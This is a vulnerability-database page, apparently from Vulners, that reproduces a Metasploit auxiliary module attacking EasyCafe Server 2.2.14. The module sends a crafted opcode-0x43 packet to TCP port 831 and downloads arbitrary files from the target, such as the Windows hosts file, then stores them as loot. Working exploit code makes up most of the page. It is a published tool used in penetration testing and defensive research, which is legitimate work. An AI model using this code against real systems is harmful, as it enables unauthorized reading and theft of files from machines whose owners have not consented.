Lucene search
K

EasyCafe Server Remote File Access

🗓️ 27 Dec 2015 12:00:50Reported by R-73eN, bcoles <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 27 Views

EasyCafe Server Remote File Access vulnerability in 831/TCP port, allows file retrieval by sending crafted packet. Successfully tested on EasyCafe Server 2.2.14 Trial mode and Demo mode on Windows XP SP3 and Windows 7 SP1

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'EasyCafe Server Remote File Access',
      'Description' => %q{
          This module exploits a file retrieval vulnerability in
        EasyCafe Server. The vulnerability can be triggered by
        sending a specially crafted packet (opcode 0x43) to the
        831/TCP port.
        This module has been successfully tested on EasyCafe Server
        version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3
        and Windows 7 SP1.
        Note that the server will throw a popup messagebox if the
        specified file does not exist.
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'R-73eN', # Vulnerability Discovery
          'bcoles' # Metasploit module
        ],
      'References'  =>
        [
          [ 'EDB', '39102' ]
        ]
    ))

    register_options(
      [
        Opt::RPORT(831),
        OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts'])
      ])
  end

  def get_file
    res = sock.get_once
    unless res
      print_error("Unable to retrieve file due to a timeout.")
      return
    end

    unless res.length == 261
      print_error("Received a response of an invalid size.")
      return
    end

    file_size = res.unpack('@256V')[0]
    contents = ''
    while contents.length < file_size
      contents << sock.get_once
    end

    print_good("File retrieved successfully (#{contents.length} bytes)!")
    contents
  end

  def run_host(ip)
    file_path = datastore['FILEPATH']
    if file_path.length > 67
      print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.")
      return
    end

    packet = "\x43"
    packet << file_path
    packet << "\x00" * (255 - file_path.length)
    packet << "\x01\x00\x00\x00\x01"

    vprint_status("Sending request (#{packet.length} bytes)")
    connect
    sock.put(packet)

    contents = get_file
    disconnect
    return if contents.nil?

    path = store_loot(
      'easycafe_server',
      'application/octet-stream',
      ip,
      contents,
      File.basename(file_path)
    )
    print_status("File saved in: #{path}")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation